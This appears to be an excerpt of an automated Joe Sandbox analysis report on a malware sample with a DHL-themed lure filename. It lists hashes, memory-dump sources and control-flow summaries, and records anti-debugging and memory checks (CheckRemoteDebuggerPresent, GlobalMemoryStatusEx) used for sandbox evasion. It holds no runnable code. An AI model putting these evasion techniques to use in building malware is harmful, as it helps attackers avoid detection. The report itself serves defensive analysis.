                                                • Opcode ID: d0b7a2a7ccfcc8289b2f408ce9c648a4cc0c6c915d99ddf90113265d4912de2c
                                                • Instruction ID: 89c60059585fbd4413ab87b4489d56c82cade9702223e950997191513b09b2a8
                                                • Opcode Fuzzy Hash: d0b7a2a7ccfcc8289b2f408ce9c648a4cc0c6c915d99ddf90113265d4912de2c
                                                • Instruction Fuzzy Hash: 10D117B1E15219DFCB58CFAAC98059EFBF6BF89300F14D52AD426AB264D7309942CF14
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: z@z
                                                • API String ID: 0-848313303
                                                • Opcode ID: e87258b38ceb509211d5e39806de583165f48c5af02f93be4e027033d23b9f40
                                                • Instruction ID: 83bcaa2ffe5345fffb99dbf8d250fc1ac60079cee9bcad20155ca78a47d90d92
                                                • Opcode Fuzzy Hash: e87258b38ceb509211d5e39806de583165f48c5af02f93be4e027033d23b9f40
                                                • Instruction Fuzzy Hash: A5E10874E102198FDB14DFA9C580AAEFBF2FF89314F248169D454AB355DB31A941CFA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 98R
                                                • API String ID: 0-576591972
                                                • Opcode ID: ff4fa83a176b80a228035e9cef940c0ada5ba7449365bdbafb62ec5c4901b7f8
                                                • Instruction ID: d1b5a540d1073c3c6d634054ba049be5e164d4a345bb5a1d72d2ccd4a61d88d6
                                                • Opcode Fuzzy Hash: ff4fa83a176b80a228035e9cef940c0ada5ba7449365bdbafb62ec5c4901b7f8
                                                • Instruction Fuzzy Hash: 847128B5E1420EEFCB08CFA5D4819AEFBB2FB89310F149529D525AB354D3349A41CF94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: rr:;
                                                • API String ID: 0-598031464
                                                • Opcode ID: 2fbbe56d173ca6e36cc7ca2c56f3aa97196c3d39e5471c0849d4d34e8de2f5da
                                                • Instruction ID: 4d7a66f71c8ff89b2451704835706f16d29ad5f43e5f976b0a01ad1e41ae91e8
                                                • Opcode Fuzzy Hash: 2fbbe56d173ca6e36cc7ca2c56f3aa97196c3d39e5471c0849d4d34e8de2f5da
                                                • Instruction Fuzzy Hash: 6B6116B4E11259CFCB04CF98D58189EFBF2BF49710F15856AD805AB254D330A941CFA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: iUfo
                                                • API String ID: 0-3820436262
                                                • Opcode ID: 17220a2079cef7e0ebd06d5deb304802c20278dc551c26e7357f4402b168ee1c
                                                • Instruction ID: 83c331f10fb7888f09c4ac83066e88a4fa7c7eb66ff257d9290f7bfd2aaa212d
                                                • Opcode Fuzzy Hash: 17220a2079cef7e0ebd06d5deb304802c20278dc551c26e7357f4402b168ee1c
                                                • Instruction Fuzzy Hash: 2F51E2B4E152199FCB08CFA9D9455EEFBF6BF89310F10902AE406BB254EB3459418F54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: iUfo
                                                • API String ID: 0-3820436262
                                                • Opcode ID: 0611b294d75cc24c12ab28d61c94a5828dad015dc90aa2bfef07835598ca3f79
                                                • Instruction ID: 6d2fa4e22374829edd903193373fb5cd499e7cd0a6bcee3f025305fc462d5ebe
                                                • Opcode Fuzzy Hash: 0611b294d75cc24c12ab28d61c94a5828dad015dc90aa2bfef07835598ca3f79
                                                • Instruction Fuzzy Hash: E751F3B4E152199FCB08CFA9D9455EEFBF2BF89310F14942AE405FB290EB345A41CB54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -2m
                                                • API String ID: 0-2686427999
                                                • Opcode ID: 352e17f72d6f34fdcba1c6b302377517f58d30954d113ff32fe3c25370de9270
                                                • Instruction ID: 7e2a30111aa8ececb1531804a7f31feb1c762027c3d399f7d2a3741907ca97d2
                                                • Opcode Fuzzy Hash: 352e17f72d6f34fdcba1c6b302377517f58d30954d113ff32fe3c25370de9270
                                                • Instruction Fuzzy Hash: 78513BB0D142199FDB08CFAAC5506AEFFF2FF8A301F24D16AD519AB294D7348941CB64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: w7e^
                                                • API String ID: 0-1657886525
                                                • Opcode ID: 21b9b420a794b1a3908952adfa039c641614a2e5c07a8800935f6cab04508457
                                                • Instruction ID: 01fd584b8451f3ecc586debb1d82f60d27f958a481a6a6d753ab0158e9ca4531
                                                • Opcode Fuzzy Hash: 21b9b420a794b1a3908952adfa039c641614a2e5c07a8800935f6cab04508457
                                                • Instruction Fuzzy Hash: 404137B5D14219DFCF08CFAAD5405EEFBB1BB8A210F14D42AC416BB284D7384642CF58
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: w7e^
                                                • API String ID: 0-1657886525
                                                • Opcode ID: 37c56e7a1e5fca362dfd73649dfc4f381fbd85b07caf2783fe22d880938e868a
                                                • Instruction ID: 31905be2a81675d423e6ba5620810f12a8b2c2653f4bcc31258a1d3ca1d12bff
                                                • Opcode Fuzzy Hash: 37c56e7a1e5fca362dfd73649dfc4f381fbd85b07caf2783fe22d880938e868a
                                                • Instruction Fuzzy Hash: 684146B5D15219CFCB08CFA6D8416EEFBB1FB8A211F14D82AC016BB294D7384642CF58
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0ni
                                                • API String ID: 0-1488673370
                                                • Opcode ID: fa4d0a876f21f76cb99c545f46311f326bdba976d1f93e8f779aaa127d7b950b
                                                • Instruction ID: 194f1177d26b915ec28dc165e2e3e3f5bc51327aa2c83d63306c7ee5b90babdb
                                                • Opcode Fuzzy Hash: fa4d0a876f21f76cb99c545f46311f326bdba976d1f93e8f779aaa127d7b950b
                                                • Instruction Fuzzy Hash: 81515AB1E146188BDB58CF6B8D4579AFAF7BFC9200F14C1BA950CA6264EB340A858F11
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0ni
                                                • API String ID: 0-1488673370
                                                • Opcode ID: 35f3e34693430b9257cd9efb11abe78d1802ad256e302344f2495c0c8956b647
                                                • Instruction ID: e840bc984408ea387e799e955d791f790696d0fdc294698d60c9a629f1686699
                                                • Opcode Fuzzy Hash: 35f3e34693430b9257cd9efb11abe78d1802ad256e302344f2495c0c8956b647
                                                • Instruction Fuzzy Hash: 32517C71E046588BDB58CF6BCD4579AFBF3BFC9200F14C1BA844CA6264EB3409858F11
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a86dbe0db76c9793b9a751c22a43ae1c47937de500cf3b14219eb372d054ba0
                                                • Instruction ID: afb3119c3392459689360574d7b67bf2bf20de75581d85260f7df56a4e5ad697
                                                • Opcode Fuzzy Hash: 4a86dbe0db76c9793b9a751c22a43ae1c47937de500cf3b14219eb372d054ba0
                                                • Instruction Fuzzy Hash: 1A32E6B4D01219CFDB14CFA9D881AEEFBB2FF89300F1481A9D559A7254DB345A85CF90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 79193bee3c6a09bda718da653fc6941e614dcd73dfe2bffa6f4778be313c804a
                                                • Instruction ID: 7b5b800dab9754582c24d5c6184c54ed2ca5f0559d83afb1122af2b7e9c450ab
                                                • Opcode Fuzzy Hash: 79193bee3c6a09bda718da653fc6941e614dcd73dfe2bffa6f4778be313c804a
                                                • Instruction Fuzzy Hash: DBE1F674E102198FDB14DFA9C580AAEFBF2FF89304F248169D455AB355DB31A941CFA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e4ee42f5e3bd81deae9b7932d865ff5bdb206f6d28b93ac0a3838041d2f617ba
                                                • Instruction ID: 9ea92bae2b415e3ae126e0e63e8807a2ea034c9cce0a8dadc44e25cd13105144
                                                • Opcode Fuzzy Hash: e4ee42f5e3bd81deae9b7932d865ff5bdb206f6d28b93ac0a3838041d2f617ba
                                                • Instruction Fuzzy Hash: 4BE10A74E1021A8FDB54DFA9C980AAEFBF2FF89304F248169D454AB355D731A941CFA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54468488e1a7be2f65d6aab652a284636833db49d1ad4c9ff037dbf0bf2e3163
                                                • Instruction ID: f2c8b80d4a2e3c980e0401c747e44e83a6c904a4d70642f24d0d781ede0cc1c1
                                                • Opcode Fuzzy Hash: 54468488e1a7be2f65d6aab652a284636833db49d1ad4c9ff037dbf0bf2e3163
                                                • Instruction Fuzzy Hash: 09E1F974E1021A8FDB14DFA9C980AAEFBF2FF89304F248569D454AB355D731A941CFA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 686eacec6b2506e8565c6dc36fd906e55e52d0324d845b6c306345ecccd93f89
                                                • Instruction ID: 9ba782f6296928860c1641c25ef08673c1ea60682312a0ea73446930685eb6e4
                                                • Opcode Fuzzy Hash: 686eacec6b2506e8565c6dc36fd906e55e52d0324d845b6c306345ecccd93f89
                                                • Instruction Fuzzy Hash: 97E1F774E102198FDB14DFA9C584AAEFBF2FF89304F248169D414AB356DB31A941CFA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51b4c3d9a4247f265e679e5eab63def5a8159620f09154304f0eab7bda4764e4
                                                • Instruction ID: 81395c305ced4d52841b1003a94e1529cc8bda13bf212bbe258d58984f86f670
                                                • Opcode Fuzzy Hash: 51b4c3d9a4247f265e679e5eab63def5a8159620f09154304f0eab7bda4764e4
                                                • Instruction Fuzzy Hash: 0AD1F835D20B5A8ACB25EB74D990A99F7B1FF99300F10C79AE04937611EB706AC4CF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 79bcfd5f455ad1f0b0db55fbd0a534455d19a17e377b665608ffe4f1948741ee
                                                • Instruction ID: 0fd4b3fd34572011d53aac39c9033c314ccb9588f612ad5957904411ad1a2761
                                                • Opcode Fuzzy Hash: 79bcfd5f455ad1f0b0db55fbd0a534455d19a17e377b665608ffe4f1948741ee
                                                • Instruction Fuzzy Hash: 00A18032E202168FCF15DFB4C9845EEBBB2FF85340B15856AE901BB265DB71E946CB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f2f2ab2b58113148471962eeb0d0dfcbd89eddf99953513c97e971cca1eec8fc
                                                • Instruction ID: 33f91ff4a7b89a102df7016ef5f8ccf6a1438f080df8ced03590a8bb8d6582da
                                                • Opcode Fuzzy Hash: f2f2ab2b58113148471962eeb0d0dfcbd89eddf99953513c97e971cca1eec8fc
                                                • Instruction Fuzzy Hash: 1FD1F835D20B5A8ACB25EB74D990A99F7B1FF99300F10C79AE04937611EB706AC4CF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd

                                                Execution Graph

                                                Execution Coverage:14%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:15%
                                                Total number of Nodes:20
                                                Total number of Limit Nodes:4
                                                execution_graph (rendered graph, 20 nodes; not reproducible as text): root nodes 1177ed0 and 11709dd; API-calling nodes 1177f14 (CheckRemoteDebuggerPresent) and 68dfc25 (GlobalMemoryStatusEx, called twice)

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph (rendered graph; not reproducible as text): function 1177ed0-1177f98, basic blocks 1177ed0-1177f54 (calls CheckRemoteDebuggerPresent), 1177f56-1177f5c and 1177f5d-1177f98
                                                APIs
                                                • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01177F47
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1534441709.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1170000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph (rendered graph; not reproducible as text): function starting at 68d47b0, basic blocks spanning 68d47b0-68d4efb, one call to 68d5059 from block 68d4901-68d494e
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fq$XPq$\Oq
                                                • API String ID: 0-132346853
                                                • Opcode ID: ee7b1851609e04d2f9292498c13b5dcd69fbd87d4c3ec3ef67b3976d1626be4f
                                                • Instruction ID: ad9160502959c9a3eb3a2f571d2efb7339c5ba693594b986461bae2f05ab8bf1
                                                • Opcode Fuzzy Hash: ee7b1851609e04d2f9292498c13b5dcd69fbd87d4c3ec3ef67b3976d1626be4f
                                                • Instruction Fuzzy Hash: 52616134F002189FEB549BA9C855BAEBBF6FF88310F208429E106EB395DF758D458B51

                                                Control-flow Graph
                                                • Graph image not captured; entry block 68dca18, calls 68d61a0 (two call sites)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0op$Dqp
                                                • API String ID: 0-2792995931
                                                • Opcode ID: f20a18da452020de727a58816a018441e50e7c48695ecb548380cd15a2e69438
                                                • Instruction ID: 8cd57044d3eed2c7587bff50d04b4100e1906715a9049b7089ac4cbf2911be81
                                                • Opcode Fuzzy Hash: f20a18da452020de727a58816a018441e50e7c48695ecb548380cd15a2e69438
                                                • Instruction Fuzzy Hash: 1DE19B30B006048FDB55EF78D581AAEBBF6AF88314F108569E906DB355EB35ED41CBA0

                                                Control-flow Graph
                                                • Graph image not captured; entry block 68d47a1, calls 68d5059
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1541359022.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_68d0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fq$XPq
                                                • API String ID: 0-3167736908
                                                • Opcode ID: 8e640c76d66e036c223efda28715d54e312410a78e4f793436438efbb6046715
                                                • Instruction ID: 1ac1753e8e0d8d008ea677a3d13fa85ed0ab991b6a07c33ed2c9c8a73bafa880
                                                • Opcode Fuzzy Hash: 8e640c76d66e036c223efda28715d54e312410a78e4f793436438efbb6046715
                                                • Instruction Fuzzy Hash: 15516E34F002189FDB549FA9C855BAEBBF6FF88310F208529E106EB395DA758C418B90

                                                Control-flow Graph
                                                • Graph image not captured; entry block 117f3ac, calls GlobalMemoryStatusEx
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 0117F44F
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1534441709.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1170000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: c81cdb42d4c340a8623f32eeafba095d8ccdedf79711c7d66a346063f4c210e9
                                                • Instruction ID: a46783250ae8975bcb01d358f2c974771fae598147cb97ecd78c649567b4321b
                                                • Opcode Fuzzy Hash: c81cdb42d4c340a8623f32eeafba095d8ccdedf79711c7d66a346063f4c210e9
                                                • Instruction Fuzzy Hash: 3721BAB1C0025A8FDB14DFAAD4487DEFBF4AF48310F10856AD928A7350D7789846CFA1

                                                Control-flow Graph
                                                • Graph image not captured; entry block 1177ec8, calls CheckRemoteDebuggerPresent
                                                APIs
                                                • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01177F47
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1534441709.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1170000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0
                                                • Opcode ID: cb9462c08b976d03cf5d3af88e1a2a49efa3d27451af9a2d2de69711b31e69f9
                                                • Instruction ID: 9a48e6492167c61ab26eba2e697b297f39fb7acd5583ad2fd92fb8db2128c79e
                                                • Opcode Fuzzy Hash: cb9462c08b976d03cf5d3af88e1a2a49efa3d27451af9a2d2de69711b31e69f9
                                                • Instruction Fuzzy Hash: 492166B18002598FDB10CF9AD584BEEBBF4AF49220F14845AE458A3351D738A945CF61

                                                Control-flow Graph
                                                • Graph image not captured; entry block 117f3e8, calls GlobalMemoryStatusEx
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 0117F44F
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1534441709.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1170000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 1003a8d2bf4257e55ce22ff0cbba0224e7376fec6f7b7e778b81d2dcb008052c
                                                • Instruction ID: 242d5257a5c6528822209a87c666f89dae89d614a58fa8d16fc7e2973678e465
                                                • Opcode Fuzzy Hash: 1003a8d2bf4257e55ce22ff0cbba0224e7376fec6f7b7e778b81d2dcb008052c
                                                • Instruction Fuzzy Hash: 0A11F3B1C0065A9BDB14DF9AC548BDEFBF4EF48320F14812AD928A7340D778A945CFA5
